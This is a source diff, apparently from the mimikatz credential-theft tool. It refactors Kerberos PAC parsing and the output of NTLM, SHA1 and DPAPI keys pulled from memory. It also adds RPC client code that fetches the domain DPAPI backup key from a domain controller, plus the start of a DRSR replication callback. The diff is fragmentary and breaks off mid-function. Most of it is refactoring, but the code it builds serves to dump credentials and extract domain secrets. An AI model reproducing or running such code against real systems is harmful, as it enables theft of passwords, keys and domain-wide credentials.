PPAC_SIGNATURE_DATA pSignatureData;
PPAC_CLIENT_INFO pClientInfo;
PGROUP_MEMBERSHIP pGroup;
PRPCE_KERB_EXTRA_SID pExtraSids;
PSID pSid;
PVOID base;
if(kull_m_file_readData(L"C:\\security\\mimikatz\\mimikatz\\bad.pac", (PBYTE *) &pacType, &pacLenght))
if(kull_m_file_readData(L"C:\\security\\bad.pac", (PBYTE *) &pacType, &pacLenght))
{
kprintf(L"version %u, nbBuffer = %u\n\n", pacType->Version, pacType->cBuffers);
@ -262,80 +142,61 @@ NTSTATUS kuhl_m_kerberos_pac_info(int argc, wchar_t * argv[])
switch(pacType->Buffers[i].ulType)
{
case PACINFO_TYPE_LOGON_INFO:
pValInfo = (PRPCE_KERB_VALIDATION_INFO) ((PBYTE) pacType + pacType->Buffers[i].Offset);
base = (PBYTE) &pValInfo->infos + sizeof(MARSHALL_KERB_VALIDATION_INFO);
kprintf(L"[%02u] %08x @ offset %016llx (%u)\n", i, pacType->Buffers[i].ulType, pacType->Buffers[i].Offset, pacType->Buffers[i].cbBufferSize);
kull_m_string_wprintf_hex((PBYTE) pacType + pacType->Buffers[i].Offset, pacType->Buffers[i].cbBufferSize, 1 | (16 << 16));
kprintf(L"\n");
kprintf(L"*** Validation Informations *** (%u)\n", pacType->Buffers[i].cbBufferSize);
kprintf(L"TypeHeader : version 0x%02x, endianness 0x%02x, length %hu (%u), filer %08x\n", pValInfo->typeHeader.Version, pValInfo->typeHeader.Endianness, pValInfo->typeHeader.CommonHeaderLength, sizeof(MARSHALL_KERB_VALIDATION_INFO), pValInfo->typeHeader.Filler);
kprintf(L"PrivateHeader : length %u, filer %08x\n", pValInfo->privateHeader.ObjectBufferLength, pValInfo->privateHeader.Filler);
kprintf(L"RootElementId : %08x\n\n", pValInfo->RootElementId);
kprintf(L"LogonTime %016llx - ", pValInfo->infos.LogonTime); kull_m_string_displayLocalFileTime(&pValInfo->infos.LogonTime); kprintf(L"\n");
kprintf(L"LogoffTime %016llx - ", pValInfo->infos.LogoffTime); kull_m_string_displayLocalFileTime(&pValInfo->infos.LogoffTime); kprintf(L"\n");
kprintf(L"KickOffTime %016llx - ", pValInfo->infos.KickOffTime); kull_m_string_displayLocalFileTime(&pValInfo->infos.KickOffTime); kprintf(L"\n");
kprintf(L"PasswordLastSet %016llx - ", pValInfo->infos.PasswordLastSet); kull_m_string_displayLocalFileTime(&pValInfo->infos.PasswordLastSet); kprintf(L"\n");
kprintf(L"PasswordCanChange %016llx - ", pValInfo->infos.PasswordCanChange); kull_m_string_displayLocalFileTime(&pValInfo->infos.PasswordCanChange); kprintf(L"\n");
kprintf(L"PasswordMustChange %016llx - ", pValInfo->infos.PasswordMustChange); kull_m_string_displayLocalFileTime(&pValInfo->infos.PasswordMustChange); kprintf(L"\n");
kprintf(L"\n");
kuhl_m_kerberos_pac_ustring(L"EffectiveName ", &pValInfo->infos.EffectiveName, base);
kuhl_m_kerberos_pac_ustring(L"FullName ", &pValInfo->infos.FullName, base);
kuhl_m_kerberos_pac_ustring(L"LogonScript ", &pValInfo->infos.LogonScript, base);
kuhl_m_kerberos_pac_ustring(L"ProfilePath ", &pValInfo->infos.ProfilePath, base);
kuhl_m_kerberos_pac_ustring(L"HomeDirectory ", &pValInfo->infos.HomeDirectory, base);
kuhl_m_kerberos_pac_ustring(L"HomeDirectoryDrive ", &pValInfo->infos.HomeDirectoryDrive, base);
kprintf(L"\n");
kprintf(L"LogonCount %hu\n", pValInfo->infos.LogonCount);
kprintf(L"BadPasswordCount %hu\n", pValInfo->infos.BadPasswordCount);
kprintf(L"\n");
kprintf(L"UserId %08x (%u)\n", pValInfo->infos.UserId, pValInfo->infos.UserId);
kprintf(L"PrimaryGroupId %08x (%u)\n", pValInfo->infos.PrimaryGroupId, pValInfo->infos.PrimaryGroupId);
kprintf(L"\n");
kprintf(L"GroupCount %u\n", pValInfo->infos.GroupCount);
pGroup = (PGROUP_MEMBERSHIP) kuhl_m_kerberos_pac_giveElementById(pValInfo->infos.GroupIds, base);
kprintf(L"GroupIds @ %08x\n * RID : ", pValInfo->infos.GroupIds);
for(j = 0; j < pValInfo->infos.GroupCount; j++)
kprintf(L"%u,", pGroup[j].RelativeId); //, pGroup[j].Attributes);
kprintf(L"\n\n");
kprintf(L"UserFlags %08x (%u)\n", pValInfo->infos.UserFlags, pValInfo->infos.UserFlags);
kprintf(L"UserSessionKey "); kull_m_string_wprintf_hex(pValInfo->infos.UserSessionKey.data, 16, 0); kprintf(L"\n");
kprintf(L"\n");
kuhl_m_kerberos_pac_ustring(L"LogonServer ", &pValInfo->infos.LogonServer, base);
kuhl_m_kerberos_pac_ustring(L"LogonDomainName ", &pValInfo->infos.LogonDomainName, base);
kprintf(L"\n");
pSid = (PSID) kuhl_m_kerberos_pac_giveElementById(pValInfo->infos.LogonDomainId, base);
kprintf(L"LogonDomainId @ %08x\n * SID : ", pValInfo->infos.LogonDomainId); kull_m_string_displaySID(pSid); kprintf(L"\n");
kprintf(L"\n");
kprintf(L"UserAccountControl %08x (%u)\n", pValInfo->infos.UserAccountControl, pValInfo->infos.UserAccountControl);
kprintf(L"SubAuthStatus %08x (%u)\n", pValInfo->infos.SubAuthStatus, pValInfo->infos.SubAuthStatus);
kprintf(L"\n");
kprintf(L"LastSuccessfulILogon %016llx\n", pValInfo->infos.LastSuccessfulILogon);
kprintf(L"LastFailedILogon %016llx\n", pValInfo->infos.LastFailedILogon);
kprintf(L"\n");
kprintf(L"FailedILogonCount %u\n", pValInfo->infos.FailedILogonCount);
kprintf(L"\n");
kprintf(L"SidCount %u\n", pValInfo->infos.SidCount);
kprintf(L"ExtraSids @ %08x\n", pValInfo->infos.ExtraSids);
pExtraSids = (PRPCE_KERB_EXTRA_SID) kuhl_m_kerberos_pac_giveElementById(pValInfo->infos.ExtraSids, base);
for(j = 0; j < pValInfo->infos.SidCount; j++)
{kull_m_string_wprintf_hex(pExtraSids, 64, 1);
pSid = (PSID) kuhl_m_kerberos_pac_giveElementById(pExtraSids[j].ExtraSid, base);
kprintf(L"ExtraSid [%u] @ %08x\n * SID : ", j, pExtraSids[j].ExtraSid); kull_m_string_displaySID(pSid); kprintf(L"\n");
if(kuhl_m_pac_DecodeValidationInformation((PBYTE) pacType + pacType->Buffers[i].Offset, pacType->Buffers[i].cbBufferSize, &pValInfo))
{
kprintf(L"LogonTime %016llx - ", pValInfo->LogonTime); kull_m_string_displayLocalFileTime(&pValInfo->LogonTime); kprintf(L"\n");
kprintf(L"LogoffTime %016llx - ", pValInfo->LogoffTime); kull_m_string_displayLocalFileTime(&pValInfo->LogoffTime); kprintf(L"\n");
kprintf(L"KickOffTime %016llx - ", pValInfo->KickOffTime); kull_m_string_displayLocalFileTime(&pValInfo->KickOffTime); kprintf(L"\n");
kprintf(L"PasswordLastSet %016llx - ", pValInfo->PasswordLastSet); kull_m_string_displayLocalFileTime(&pValInfo->PasswordLastSet); kprintf(L"\n");
kprintf(L"PasswordCanChange %016llx - ", pValInfo->PasswordCanChange); kull_m_string_displayLocalFileTime(&pValInfo->PasswordCanChange); kprintf(L"\n");
kprintf(L"PasswordMustChange %016llx - ", pValInfo->PasswordMustChange); kull_m_string_displayLocalFileTime(&pValInfo->PasswordMustChange); kprintf(L"\n");
kprintf(L"EffectiveName %wZ\n", &pValInfo->EffectiveName);
kprintf(L"FullName %wZ\n", &pValInfo->FullName);
kprintf(L"LogonScript %wZ\n", &pValInfo->LogonScript);
kprintf(L"ProfilePath %wZ\n", &pValInfo->ProfilePath);
kprintf(L"HomeDirectory %wZ\n", &pValInfo->HomeDirectory);
kprintf(L"HomeDirectoryDrive %wZ\n", &pValInfo->HomeDirectoryDrive);
kprintf(L"LogonCount %hu\n", pValInfo->LogonCount);
kprintf(L"BadPasswordCount %hu\n", pValInfo->BadPasswordCount);
kprintf(L"UserId %08x (%u)\n", pValInfo->UserId, pValInfo->UserId);
kprintf(L"PrimaryGroupId %08x (%u)\n", pValInfo->PrimaryGroupId, pValInfo->PrimaryGroupId);
kprintf(L"GroupCount %u\n", pValInfo->GroupCount);
kprintf(L"GroupIds ");
for(j = 0; j < pValInfo->GroupCount; j++)
kprintf(L"%u, ", pValInfo->GroupIds[j].RelativeId); //, pGroup[j].Attributes);
kprintf(L"\n");
kprintf(L"UserFlags %08x (%u)\n", pValInfo->UserFlags, pValInfo->UserFlags);
kprintf(L"UserSessionKey "); kull_m_string_wprintf_hex(pValInfo->UserSessionKey.data, 16, 0); kprintf(L"\n");
kprintf(L"LogonServer %wZ\n", &pValInfo->LogonServer);
kprintf(L"LogonDomainName %wZ\n", &pValInfo->LogonDomainName);
kprintf(L"LogonDomainId "); kull_m_string_displaySID(pValInfo->LogonDomainId); kprintf(L"\n");
kprintf(L"UserAccountControl %08x (%u)\n", pValInfo->UserAccountControl, pValInfo->UserAccountControl);
kprintf(L"SubAuthStatus %08x (%u)\n", pValInfo->SubAuthStatus, pValInfo->SubAuthStatus);
kprintf(L"LastSuccessfulILogon %016llx - ", pValInfo->LastSuccessfulILogon); kull_m_string_displayLocalFileTime(&pValInfo->LastSuccessfulILogon); kprintf(L"\n");
kprintf(L"LastFailedILogon %016llx - ", pValInfo->LastFailedILogon); kull_m_string_displayLocalFileTime(&pValInfo->LastFailedILogon); kprintf(L"\n");
kprintf(L"FailedILogonCount %08x (%u)\n", pValInfo->FailedILogonCount, pValInfo->FailedILogonCount);
kprintf(L"SidCount %u\n", pValInfo->SidCount);
kprintf(L"ExtraSids\n");
for(j = 0; j < pValInfo->SidCount; j++)
{
kprintf(L" ");
kull_m_string_displaySID(pValInfo->ExtraSids[j].Sid);
kprintf(L"\n");
}
kprintf(L"ResourceGroupDomainSid "); if(pValInfo->ResourceGroupDomainSid) kull_m_string_displaySID(pValInfo->ResourceGroupDomainSid); kprintf(L"\n");
kprintf(L"ResourceGroupCount %u\n", pValInfo->ResourceGroupCount);
kprintf(L"ResourceGroupIds ");
for(j = 0; j < pValInfo->ResourceGroupCount; j++)
kprintf(L"%u, ", pValInfo->ResourceGroupIds[j].RelativeId); //, pGroup[j].Attributes);
kuhl_m_pac_FreeValidationInformation(&pValInfo);
kprintf(L"\n");
}
kprintf(L"\n");
pSid = (PSID) kuhl_m_kerberos_pac_giveElementById(pValInfo->infos.ResourceGroupDomainSid, base);
kprintf(L"ResourceGroupDomainSid @ %08x\n * SID : ", pValInfo->infos.ResourceGroupDomainSid); if(pSid) kull_m_string_displaySID(pSid); kprintf(L"\n");
kprintf(L"ResourceGroupCount %u\n", pValInfo->infos.ResourceGroupCount);
pGroup = (PGROUP_MEMBERSHIP) kuhl_m_kerberos_pac_giveElementById(pValInfo->infos.ResourceGroupIds, base);
kprintf(L"ResourceGroupIds @ %08x\n * RID : ", pValInfo->infos.ResourceGroupIds);
for(j = 0; j < pValInfo->infos.ResourceGroupCount; j++)
kprintf(L"%u,", pGroup[j].RelativeId); //, pGroup[j].Attributes);
break;
case PACINFO_TYPE_CHECKSUM_SRV: // Server Signature
case PACINFO_TYPE_CHECKSUM_KDC: // KDC Signature
pSignatureData = (PPAC_SIGNATURE_DATA) ((PBYTE) pacType + pacType->Buffers[i].Offset);
kprintf(L"*** %s Signature ***\n", (pacType->Buffers[i].ulType == 0x00000006) ? L"Server" : L"KDC");
kprintf(L"*** %s Signature ***\n", (pacType->Buffers[i].ulType == PACINFO_TYPE_CHECKSUM_SRV) ? L"Server" : L"KDC");
kprintf(L"Type %08x - (%hu) : ", pSignatureData->SignatureType, 0);//pSignatureData->RODCIdentifier);
kull_m_string_wprintf_hex(pSignatureData->Signature, (pSignatureData->SignatureType == KERB_CHECKSUM_HMAC_MD5) ? LM_NTLM_HASH_LENGTH : 12, 0);
kprintf(L"\n");

View File

@ -7,8 +7,7 @@
#include "../kuhl_m.h"
#include "../modules/kull_m_file.h"
#include "../modules/kull_m_crypto_system.h"
#include "../modules/kull_m_rpce.h"
#include "../modules/kull_m_rpc_ms-pac.h"
#include "../modules/rpc/kull_m_rpc_pac.h"
#define KERB_NON_KERB_SALT 16
#define KERB_NON_KERB_CKSUM_SALT 17
@ -46,20 +45,9 @@ typedef struct _PAC_CLIENT_INFO {
} PAC_CLIENT_INFO, *PPAC_CLIENT_INFO;
BOOL kuhl_m_pac_validationInfo_to_PAC(PKERB_VALIDATION_INFO validationInfo, DWORD SignatureType, PPACTYPE *pacType, DWORD *pacLength);
BOOL kuhl_m_pac_validationInfo_to_LOGON_INFO(PKERB_VALIDATION_INFO validationInfo, PVOID *rpceValidationInfo, DWORD *rpceValidationInfoLength);
BOOL kuhl_m_pac_validationInfo_to_CNAME_TINFO(PKERB_VALIDATION_INFO validationInfo, PPAC_CLIENT_INFO *pacClientInfo, DWORD *pacClientInfoLength);
NTSTATUS kuhl_m_pac_signature(PPACTYPE pacType, DWORD pacLenght, DWORD SignatureType, LPCVOID key, DWORD keySize);
#ifdef KERBEROS_TOOLS
typedef struct _RPCE_LAZY_ELEMENT_HEADER {
RPCEID ElementId;
ULONG32 ElementSize;
ULONG32 FixedBeginSize;
BOOL isBuffer;
} RPCE_LAZY_ELEMENT_HEADER, PRPCE_LAZY_ELEMENT_HEADER;
PVOID kuhl_m_kerberos_pac_giveElementById(RPCEID id, LPCVOID base);
void kuhl_m_kerberos_pac_ustring(LPCWCHAR prefix, PMARSHALL_UNICODE_STRING pString, PVOID base);
NTSTATUS kuhl_m_kerberos_pac_info(int argc, wchar_t * argv[]);
#endif

View File

@ -15,7 +15,7 @@
#include "../modules/kull_m_string.h"
#include "../modules/kull_m_samlib.h"
#include "../modules/kull_m_net.h"
#include "../modules/kull_m_rpc_drsr.h"
#include "../modules/rpc/kull_m_rpc_drsr.h"
#include "kuhl_m_lsadump_remote.h"
#include "kuhl_m_crypto.h"
#include "dpapi/kuhl_m_dpapi_oe.h"

View File

@ -7,7 +7,7 @@
#include "globals.h"
#include "../modules/kull_m_patch.h"
#include "../modules/kull_m_process.h"
#include "../modules/kull_m_rpce.h"
#include "../modules/rpc/kull_m_rpc.h"
#include "../dpapi/kuhl_m_dpapi_oe.h"
typedef struct _RTL_BALANCED_LINKS {

View File

@ -1091,35 +1091,33 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
VOID kuhl_m_sekurlsa_genericKeyOutput(PMARSHALL_KEY key, PVOID * dirtyBase, LPCWSTR sid)
{
PBYTE addr = (PBYTE) *dirtyBase + sizeof(ULONG);
if(key && key->unkId)
if(key)
{
switch(key->unkId)
switch(key->type)
{
case 0x00010002:
case 0x00010003:
case CREDENTIALS_KEY_TYPE_NTLM:
kprintf(L"\n\t * NTLM : ");
if(sid)
kuhl_m_dpapi_oe_credential_add(sid, NULL, addr, NULL, NULL, NULL);
break;
case 0x00020002:
case CREDENTIALS_KEY_TYPE_SHA1:
kprintf(L"\n\t * SHA1 : ");
if(sid)
kuhl_m_dpapi_oe_credential_add(sid, NULL, NULL, addr, NULL, NULL);
break;
case 0x00030002:
case 0x00030003:
case CREDENTIALS_KEY_TYPE_ROOTKEY:
kprintf(L"\n\t * RootKey : ");
break;
case 0x00040002:
case CREDENTIALS_KEY_TYPE_DPAPI_PROTECTION:
case 0x00040003:
kprintf(L"\n\t * DPAPI : ");
if(sid)
kuhl_m_dpapi_oe_credential_add(sid, NULL, NULL, NULL, addr, NULL);
break;
default:
kprintf(L"\n\t * %08x : ", key->unkId);
kprintf(L"\n\t * %08x : ", key->type);
}
kull_m_string_wprintf_hex(addr, key->length, 0);
kull_m_string_wprintf_hex(addr, key->size, 0);
*dirtyBase = addr + *(PULONG) *dirtyBase;
}
}

View File

@ -65,10 +65,18 @@ typedef struct _MSV1_0_PRIMARY_HELPER {
LONG offsetToIso;
} MSV1_0_PRIMARY_HELPER, *PMSV1_0_PRIMARY_HELPER;
typedef enum _KIWI_CREDENTIALS_KEY_TYPE {
CREDENTIALS_KEY_TYPE_NTLM = 1,
CREDENTIALS_KEY_TYPE_SHA1 = 2,
CREDENTIALS_KEY_TYPE_ROOTKEY = 3,
CREDENTIALS_KEY_TYPE_DPAPI_PROTECTION = 4,
} KIWI_CREDENTIALS_KEY_TYPE;
typedef struct _MARSHALL_KEY {
DWORD unkId;
USHORT unk0;
USHORT length;
WORD unk0;
WORD type;
WORD iterations;
WORD size;
RPCEID ElementId;
} MARSHALL_KEY, *PMARSHALL_KEY;

View File

@ -88,10 +88,18 @@ typedef struct _RPCE_PRIVATE_HEADER {
typedef ULONG32 RPCEID;
typedef enum _KIWI_CREDENTIALS_KEY_TYPE {
CREDENTIALS_KEY_TYPE_NTLM = 1,
CREDENTIALS_KEY_TYPE_SHA1 = 2,
CREDENTIALS_KEY_TYPE_ROOTKEY = 3,
CREDENTIALS_KEY_TYPE_DPAPI_PROTECTION = 4,
} KIWI_CREDENTIALS_KEY_TYPE;
typedef struct _MARSHALL_KEY {
DWORD unkId;
USHORT unk0;
USHORT length;
WORD unk0;
WORD type;
WORD iterations;
WORD size;
RPCEID ElementId;
} MARSHALL_KEY, *PMARSHALL_KEY;

View File

@ -398,27 +398,24 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
VOID kuhl_m_sekurlsa_genericKeyOutput(PMARSHALL_KEY key, PVOID * dirtyBase)
{
switch(key->unkId)
switch(key->type)
{
case 0x00010002:
case 0x00010003:
case CREDENTIALS_KEY_TYPE_NTLM:
dprintf("\n\t * NTLM : ");
break;
case 0x00020002:
case CREDENTIALS_KEY_TYPE_SHA1:
dprintf("\n\t * SHA1 : ");
break;
case 0x00030002:
case 0x00030003:
case CREDENTIALS_KEY_TYPE_ROOTKEY:
dprintf("\n\t * RootKey : ");
break;
case 0x00040002:
case 0x00040003:
case CREDENTIALS_KEY_TYPE_DPAPI_PROTECTION:
dprintf("\n\t * DPAPI : ");
break;
default:
dprintf("\n\t * %08x : ", key->unkId);
dprintf("\n\t * %08x : ", key->type);
}
kull_m_string_dprintf_hex((PBYTE) *dirtyBase + sizeof(ULONG), key->length, 0);
kull_m_string_dprintf_hex((PBYTE) *dirtyBase + sizeof(ULONG), key->size, 0);
*dirtyBase = (PBYTE) *dirtyBase + sizeof(ULONG) + *(PULONG) *dirtyBase;
}

View File

@ -9,7 +9,7 @@
#include "kull_m_crypto_system.h"
#include "kull_m_string.h"
#include "kull_m_net.h"
#include "kull_m_rpc_bkrp.h"
#include "rpc/kull_m_rpc_bkrp.h"
const GUID KULL_M_DPAPI_GUID_PROVIDER;

92
modules/rpc/kull_m_rpc.c Normal file
View File

@ -0,0 +1,92 @@
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kull_m_rpc.h"
BOOL kull_m_rpc_createBinding(LPCWSTR ProtSeq, LPCWSTR NetworkAddr, LPCWSTR Endpoint, LPCWSTR Service, DWORD ImpersonationType, RPC_BINDING_HANDLE *hBinding, void (RPC_ENTRY * RpcSecurityCallback)(void *))
{
BOOL status = FALSE;
RPC_STATUS rpcStatus;
RPC_WSTR StringBinding = NULL;
RPC_SECURITY_QOS SecurityQOS = {RPC_C_SECURITY_QOS_VERSION, RPC_C_QOS_CAPABILITIES_MUTUAL_AUTH, RPC_C_QOS_IDENTITY_STATIC, ImpersonationType};
LPWSTR fullServer;
DWORD szServer = (DWORD) (wcslen(NetworkAddr) * sizeof(wchar_t)), szPrefix = (DWORD) (wcslen(Service) * sizeof(wchar_t));
*hBinding = NULL;
rpcStatus = RpcStringBindingCompose(NULL, (RPC_WSTR) ProtSeq, (RPC_WSTR) NetworkAddr, (RPC_WSTR) Endpoint, NULL, &StringBinding);
if(rpcStatus == RPC_S_OK)
{
rpcStatus = RpcBindingFromStringBinding(StringBinding, hBinding);
if(rpcStatus == RPC_S_OK)
{
if(*hBinding)
{
if(fullServer = (LPWSTR) LocalAlloc(LPTR, szPrefix + sizeof(wchar_t) + szServer + sizeof(wchar_t)))
{
RtlCopyMemory(fullServer, Service, szPrefix);
RtlCopyMemory((PBYTE) fullServer + szPrefix + sizeof(wchar_t), NetworkAddr, szServer);
((PBYTE) fullServer)[szPrefix] = L'/';
rpcStatus = RpcBindingSetAuthInfoEx(*hBinding, (RPC_WSTR) fullServer, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, (MIMIKATZ_NT_BUILD_NUMBER < KULL_M_WIN_BUILD_VISTA) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE, NULL, 0, &SecurityQOS);
if(rpcStatus == RPC_S_OK)
{
if(RpcSecurityCallback)
{
rpcStatus = RpcBindingSetOption(*hBinding, RPC_C_OPT_SECURITY_CALLBACK, (ULONG_PTR) RpcSecurityCallback);
status = (rpcStatus == RPC_S_OK);
if(!status)
PRINT_ERROR(L"RpcBindingSetOption: 0x%08x (%u)\n", rpcStatus, rpcStatus);
}
else status = TRUE;
}
else PRINT_ERROR(L"RpcBindingSetAuthInfoEx: 0x%08x (%u)\n", rpcStatus, rpcStatus);
LocalFree(fullServer);
}
}
else PRINT_ERROR(L"No Binding!\n");
}
else PRINT_ERROR(L"RpcBindingFromStringBinding: 0x%08x (%u)\n", rpcStatus, rpcStatus);
RpcStringFree(&StringBinding);
}
else PRINT_ERROR(L"RpcStringBindingCompose: 0x%08x (%u)\n", rpcStatus, rpcStatus);
return status;
}
BOOL kull_m_rpc_deleteBinding(RPC_BINDING_HANDLE *hBinding)
{
BOOL status = FALSE;
if(status = (RpcBindingFree(hBinding) == RPC_S_OK))
*hBinding = NULL;
return status;
}
void __RPC_FAR * __RPC_USER midl_user_allocate(size_t cBytes)
{
void __RPC_FAR * ptr = NULL;
if(ptr = malloc(cBytes))
RtlZeroMemory(ptr, cBytes);
return ptr;
}
void __RPC_USER midl_user_free(void __RPC_FAR * p)
{
free(p);
}
void __RPC_USER ReadFcn(void *State, char **pBuffer, unsigned int *pSize)
{
*pBuffer = (char *) ((PKULL_M_RPC_FCNSTRUCT) State)->addr;
((PKULL_M_RPC_FCNSTRUCT) State)->addr = *pBuffer + *pSize;
((PKULL_M_RPC_FCNSTRUCT) State)->size -= *pSize;
}
void __RPC_USER WriteFcn(void *State, char *Buffer, unsigned int Size)
{
;
}
void __RPC_USER AllocFcn (void *State, char **pBuffer, unsigned int *pSize)
{
; // ???
}

60
modules/rpc/kull_m_rpc.h Normal file
View File

@ -0,0 +1,60 @@
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#pragma once
#include "globals.h"
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 475
#endif
#include <rpc.h>
#include <rpcndr.h>
#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif // __RPCNDR_H_VERSION__
#include "midles.h"
#include <string.h>
#include "kull_m_rpc_ms-dtyp.h"
BOOL kull_m_rpc_createBinding(LPCWSTR ProtSeq, LPCWSTR NetworkAddr, LPCWSTR Endpoint, LPCWSTR Service, DWORD ImpersonationType, RPC_BINDING_HANDLE *hBinding, void (RPC_ENTRY * RpcSecurityCallback)(void *));
BOOL kull_m_rpc_deleteBinding(RPC_BINDING_HANDLE *hBinding);
typedef struct _RPCE_COMMON_TYPE_HEADER {
UCHAR Version;
UCHAR Endianness;
USHORT CommonHeaderLength;
ULONG Filler;
} RPCE_COMMON_TYPE_HEADER, *PRPCE_COMMON_TYPE_HEADER;
typedef struct _RPCE_PRIVATE_HEADER {
ULONG ObjectBufferLength;
ULONG Filler;
} RPCE_PRIVATE_HEADER, *PRPCE_PRIVATE_HEADER;
typedef ULONG32 RPCEID;
typedef struct _KULL_M_RPC_FCNSTRUCT {
PVOID addr;
size_t size;
} KULL_M_RPC_FCNSTRUCT, *PKULL_M_RPC_FCNSTRUCT;
void __RPC_FAR * __RPC_USER midl_user_allocate(size_t cBytes);
void __RPC_USER midl_user_free(void __RPC_FAR * p);
void __RPC_USER ReadFcn(void *State, char **pBuffer, unsigned int *pSize);
void __RPC_USER WriteFcn(void *State, char *Buffer, unsigned int Size);
void __RPC_USER AllocFcn (void *State, char **pBuffer, unsigned int *pSize);
#define RPC_EXCEPTION (RpcExceptionCode() != STATUS_ACCESS_VIOLATION) && \
(RpcExceptionCode() != STATUS_DATATYPE_MISALIGNMENT) && \
(RpcExceptionCode() != STATUS_PRIVILEGED_INSTRUCTION) && \
(RpcExceptionCode() != STATUS_ILLEGAL_INSTRUCTION) && \
(RpcExceptionCode() != STATUS_BREAKPOINT) && \
(RpcExceptionCode() != STATUS_STACK_OVERFLOW) && \
(RpcExceptionCode() != STATUS_IN_PAGE_ERROR) && \
(RpcExceptionCode() != STATUS_ASSERTION_FAILURE) && \
(RpcExceptionCode() != STATUS_STACK_BUFFER_OVERRUN) && \
(RpcExceptionCode() != STATUS_GUARD_PAGE_VIOLATION)

View File

@ -0,0 +1,65 @@
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kull_m_rpc_bkrp.h"
BOOL kull_m_rpc_bkrp_createBinding(LPCWSTR NetworkAddr, RPC_BINDING_HANDLE *hBinding)
{
BOOL status = FALSE;
LPWSTR szTmpDc = NULL;
if(!NetworkAddr)
if(kull_m_net_getDC(NULL, DS_WRITABLE_REQUIRED, &szTmpDc))
NetworkAddr = szTmpDc;
if(NetworkAddr)
status = kull_m_rpc_createBinding(L"ncacn_np", NetworkAddr, L"\\pipe\\protected_storage", L"ProtectedStorage", RPC_C_IMP_LEVEL_IMPERSONATE, hBinding, NULL);
if(szTmpDc)
LocalFree(szTmpDc);
return status;
}
BOOL kull_m_rpc_bkrp_generic(LPCWSTR NetworkAddr, const GUID * pGuid, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut)
{
BOOL status = FALSE;
RPC_BINDING_HANDLE hBinding;
NET_API_STATUS netStatus;
PBYTE out = NULL;
*pDataOut = NULL;
*pdwDataOut = 0;
if(kull_m_rpc_bkrp_createBinding(NetworkAddr, &hBinding))
{
RpcTryExcept
{
netStatus = BackuprKey(hBinding, (GUID *) pGuid, (PBYTE) DataIn, dwDataIn, &out, pdwDataOut, 0);
if(status = (netStatus == 0))
{
if(*pDataOut = LocalAlloc(LPTR, *pdwDataOut))
RtlCopyMemory(*pDataOut, out, *pdwDataOut);
MIDL_user_free(out);
}
else PRINT_ERROR(L"BackuprKey 0x%08x (%u)\n", netStatus, netStatus);
}
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
kull_m_rpc_deleteBinding(&hBinding);
}
return status;
}
BOOL kull_m_rpc_bkrp_Restore(LPCWSTR NetworkAddr, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut)
{
return kull_m_rpc_bkrp_generic(NetworkAddr, &BACKUPKEY_RESTORE_GUID, DataIn, dwDataIn, pDataOut, pdwDataOut);
}
BOOL kull_m_rpc_bkrp_Backup(LPCWSTR NetworkAddr, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut)
{
return kull_m_rpc_bkrp_generic(NetworkAddr, &BACKUPKEY_BACKUP_GUID, DataIn, dwDataIn, pDataOut, pdwDataOut);
}
BOOL kull_m_rpc_bkrp_BackupKey(LPCWSTR NetworkAddr, PVOID *pDataOut, DWORD *pdwDataOut)
{
BYTE dataIn = 'k';
return kull_m_rpc_bkrp_generic(NetworkAddr, &BACKUPKEY_RETRIEVE_BACKUP_KEY_GUID, &dataIn, 0, pDataOut, pdwDataOut);
}

View File

@ -0,0 +1,17 @@
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#pragma once
#include "globals.h"
#include "kull_m_rpc_ms-bkrp.h"
#include "../kull_m_net.h"
BOOL kull_m_rpc_bkrp_createBinding(LPCWSTR NetworkAddr, RPC_BINDING_HANDLE *hBinding);
BOOL kull_m_rpc_bkrp_generic(LPCWSTR NetworkAddr, const GUID * pGuid, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut);
BOOL kull_m_rpc_bkrp_Restore(LPCWSTR NetworkAddr, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut);
BOOL kull_m_rpc_bkrp_Backup(LPCWSTR NetworkAddr, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut);
BOOL kull_m_rpc_bkrp_BackupKey(LPCWSTR NetworkAddr, PVOID *pDataOut, DWORD *pdwDataOut);

View File

@ -0,0 +1,415 @@
/* Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com / http://blog.gentilkiwi.com )
Vincent LE TOUX ( vincent.letoux@gmail.com / http://www.mysmartlogon.com )
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kull_m_rpc_drsr.h"
SecPkgContext_SessionKey kull_m_rpc_drsr_g_sKey = {0, NULL};
void RPC_ENTRY kull_m_rpc_drsr_RpcSecurityCallback(void *Context)
{
RPC_STATUS rpcStatus;
SECURITY_STATUS secStatus;
PCtxtHandle data = NULL;
rpcStatus = I_RpcBindingInqSecurityContext(Context, (LPVOID *) &data);
if(rpcStatus == RPC_S_OK)
{
if(kull_m_rpc_drsr_g_sKey.SessionKey)
{
